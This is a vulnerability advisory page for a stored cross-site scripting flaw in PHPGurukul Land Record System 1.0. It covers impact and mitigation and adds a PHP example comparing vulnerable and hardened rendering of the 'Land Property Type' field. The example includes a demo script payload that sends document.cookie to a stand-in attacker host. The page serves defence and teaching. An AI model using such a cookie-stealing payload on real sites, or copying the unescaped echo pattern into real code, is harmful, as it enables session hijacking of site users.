Platform
php
Component
land-record-system
Fixed in
1.0.1
CVE-2024-13075 is a cross-site scripting (XSS) vulnerability, classified as problematic, affecting PHPGurukul Land Record System version 1.0. The flaw allows an attacker to inject script into the application's pages, which can lead to session hijacking or defacement. A fix is available in version 1.0.1, and the vulnerability details have been publicly disclosed.
The XSS vulnerability in Land Record System allows an attacker to inject arbitrary JavaScript into the application's web pages. The injection point is the 'Land Property Type' parameter handled by /admin/add-propertytype.php, which can be reached by crafting a malicious URL or by submitting a crafted value through the form field. Successful exploitation could allow an attacker to steal user session cookies, redirect users to phishing sites, or modify the content of the page displayed to other users. Note that the affected page sits under /admin/, so the attacker either needs access to that administrative form or must get an administrator to submit the crafted value; this is consistent with the low severity rating. The impact is amplified because the application manages land records: an attacker who hijacks an administrative session could potentially alter or view confidential information.
This vulnerability has been publicly disclosed, which increases the risk of exploitation. While the CVSS score is LOW, XSS payloads are trivial to craft, and the potential impact on sensitive data warrants prompt attention. No active campaigns targeting this specific vulnerability had been reported at the time of writing, but the public disclosure makes it a plausible target for opportunistic attackers. The vulnerability was published on 2024-12-31.
Exploit Status
EPSS
0.13% (32nd percentile)
The primary mitigation for CVE-2024-13075 is to upgrade to version 1.0.1 of PHPGurukul Land Record System. If upgrading is not immediately feasible, harden the 'Land Property Type' field in /admin/add-propertytype.php directly: validate the value server-side against the format a property type label should have (reject anything else rather than trying to strip tags), and apply context-specific output encoding wherever the stored value is rendered, since the value is displayed back to other users. A web application firewall (WAF) configured to detect and block common XSS payloads adds a temporary layer of protection but is not a substitute for fixing the code. Regularly review and update the application's codebase to address further security vulnerabilities.
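The following is an added example written for this page, not PHPGurukul's code: it models the pattern the advisory describes, an administrative form field ('Land Property Type') that is stored and later rendered, and shows the vulnerable rendering beside a hardened version. The parameter name `propertytype`, the table `tblpropertytype`, and the function names are assumptions for illustration and are not taken from the real add-propertytype.php.

```php
<?php
// Added example, not PHPGurukul Land Record System code. Identifiers such as
// $_POST['propertytype'] and the table tblpropertytype are assumed for
// illustration and are not the real file's names.

declare(strict_types=1);

// Defence in depth: a CSP header limits what injected inline script can do.
// It must be sent before any output (no-op when run from the CLI).
if (!headers_sent()) {
    header("Content-Security-Policy: default-src 'self'");
}

// --- Vulnerable pattern: the stored value is echoed straight into HTML ------
function renderVulnerable(string $propertyType): string
{
    // Whatever was submitted, e.g. <script>...</script>, becomes markup here.
    return '<td>' . $propertyType . '</td>';
}

// --- Hardened pattern --------------------------------------------------------

// 1. Server-side validation. A property type is a short human label made of
//    letters, digits, spaces and a little punctuation. Reject on mismatch
//    instead of trying to strip tags; stripping is easy to bypass.
function validatePropertyType(string $input): ?string
{
    $value = trim($input);
    if ($value === '' || mb_strlen($value, 'UTF-8') > 100) {
        return null;
    }
    if (!preg_match('/\A[\p{L}\p{N} .,\'\-\/&()]+\z/u', $value)) {
        return null;
    }
    return $value;
}

// 2. Context-specific output encoding for the HTML text/attribute context.
//    ENT_QUOTES also encodes single quotes, ENT_SUBSTITUTE avoids returning
//    an empty string on invalid UTF-8.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderHardened(string $propertyType): string
{
    return '<td>' . e($propertyType) . '</td>';
}

// 3. Persist with a prepared statement so the same field is not also an
//    SQL injection point. Validation happens before this is called.
function storePropertyType(PDO $db, string $propertyType): bool
{
    $stmt = $db->prepare('INSERT INTO tblpropertytype (PropertyType) VALUES (:pt)');
    return $stmt->execute([':pt' => $propertyType]);
}

// Constructed demo payload; in the application this would arrive as
// $_POST['propertytype'] from the admin form.
$payload = '<script>location="https://attacker.example/?c="+document.cookie</script>';

echo 'Vulnerable: ' . renderVulnerable($payload) . PHP_EOL;
echo 'Hardened:   ' . renderHardened($payload) . PHP_EOL;

var_dump(validatePropertyType($payload));            // NULL: rejected at input
var_dump(validatePropertyType('Agricultural Land'));  // string(17) "Agricultural Land"
```

Validation and encoding are independent controls: validation keeps garbage out of the database, while encoding at the point of output protects every page that displays the value, including records inserted before the fix. Apply the same `e()` wrapper to the property type wherever it is rendered, not only on the add page.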
CVE-2024-13075 is a cross-site scripting (XSS) vulnerability in PHPGurukul Land Record System version 1.0 that allows attackers to inject malicious scripts through the 'Land Property Type' parameter of /admin/add-propertytype.php.
You are affected if you are using PHPGurukul Land Record System version 1.0. Upgrade to version 1.0.1 to mitigate the risk.
Upgrade to version 1.0.1. If immediate upgrade is not possible, implement input validation and output encoding.
While no active campaigns are currently confirmed, the public disclosure increases the risk of exploitation.
Refer to the PHPGurukul website or security advisories for the official advisory regarding CVE-2024-13075.